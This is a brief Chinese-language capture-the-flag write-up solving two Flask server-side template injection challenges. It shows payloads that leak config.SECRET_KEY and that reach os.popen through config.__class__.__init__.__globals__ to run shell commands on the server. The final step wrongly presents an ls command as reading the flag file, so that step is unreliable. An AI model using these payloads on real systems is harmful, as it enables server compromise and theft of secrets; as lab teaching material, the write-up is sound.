首先我们进入页面,会得到一段文字,其让我们找到flag参数。
接下来,就可以按f12,去检查它的页面,从而得到这么一段提示。
根据提示信息,我们利用flask的模板注入/?flag={{config.SECRET_KEY}},就能直接得到flag。
Simple_SSTI_2
一进来,发现和1一样,就先试试f12检查页面试试。
这时,发现没有什么提示信息,就只能试{{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}从而读取网站系统目录,发现存在一些文件夹,然后猜测有没有flag文件,就试试挨着找找看。
通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,一下子就发现存在flag文件。
最后再补上{{ config.__class__.__init__.__globals__['os'].popen('ls ../app/flag').read() }}flag的路径,就可以读取flag文件了。
##__class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
##__init__ 初始化类,返回的类型是function
##__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
##os.popen() 方法用于从一个命令打开一个管道。
##open() 方法用于打开一个文件,并返回文件对象